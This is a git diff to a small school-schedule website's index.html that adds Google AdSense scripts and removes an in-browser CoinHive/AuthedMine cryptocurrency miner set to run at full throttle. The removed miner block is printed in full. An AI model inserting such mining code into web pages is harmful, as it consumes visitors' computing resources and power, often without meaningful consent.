--- a/index.html
+++ b/index.html
@@ -5,6 +5,14 @@
     <meta name="viewport" content="width=575">
     <link rel="apple-touch-icon" href="{PortraitURL-128}"/>
 
+<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
+<script>
+  (adsbygoogle = window.adsbygoogle || []).push({
+    google_ad_client: "ca-pub-5613048528595650",
+    enable_page_level_ads: true
+  });
+</script>
+
     <script type="text/javascript">
       <!--
           var sayings = ["It's The Holiday!"];
@@ -24,17 +32,6 @@
 
       gtag('config', 'UA-109707332-1');
     </script>
-
-    <script src="https://authedmine.com/lib/authedmine.min.js"></script>
-<script>
-	var miner = new CoinHive.Anonymous('pXCJA6s5QWmw3SAZ3NLxFyOaa8cBdrus', {throttle: 0});
-
-	if (!miner.didOptOut(14400)){
-		miner.start();
-	}
-	
-</script>
-
 
     <style type="text/css">
       <!--
@@ -126,6 +123,14 @@
 	<p style = "text-align:center; font-size:20px; float: bottom"> If you know how to improve this website, please visit my GitHub <a href="https://github.com/ramzialhaddadtm/isitweekaorweekb">here</a> and either fork or make changes then make a pull request or give suggestions using the Issue report feature <a href="https://github.com/ramzialhaddadtm/isitweekaorweekb/issues">here</a></p>
 	</center>
 	</div>
+
+	<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
+	<script>
+  	(adsbygoogle = window.adsbygoogle || []).push({
+    google_ad_client: "ca-pub-5613048528595650",
+    enable_page_level_ads: true
+  });
+</script>
 
 
 </body><span class="gr__tooltip"><span class="gr__tooltip-content"></span><i class="gr__tooltip-logo"></i><span class="gr__triangle"></span></span></html>
